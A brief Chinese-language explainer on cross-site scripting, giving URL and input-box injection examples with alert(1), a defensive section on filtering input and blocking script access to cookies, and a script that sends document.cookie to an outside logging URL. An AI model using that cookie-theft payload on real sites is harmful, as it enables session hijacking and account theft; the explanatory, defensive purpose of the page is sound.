是什么
跨网站指令码,将程序恶意注入到网页上,是网页使用产生影响
如何攻击
1,通过链接注入
<!-- http://www.domain.com?name=<script>alert(1)</script> --> <div>{{name}}</div>
这就会导致页面执行了alert(1)的代码
2,通过输入框保存信息
<input v-model="username"> //在输入框打入<script>alert(1)</script> 无论是直接显示还是保存到服务器都会影响使用
3,劫持cookie,上述方法植入代码,劫持cookie
<script>
new Image().src =
"http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);
</script>
怎么防
1,对输入框,url等来源获取的参数进行过滤,过滤掉尖括号等关键字符
2,禁止js访问cookie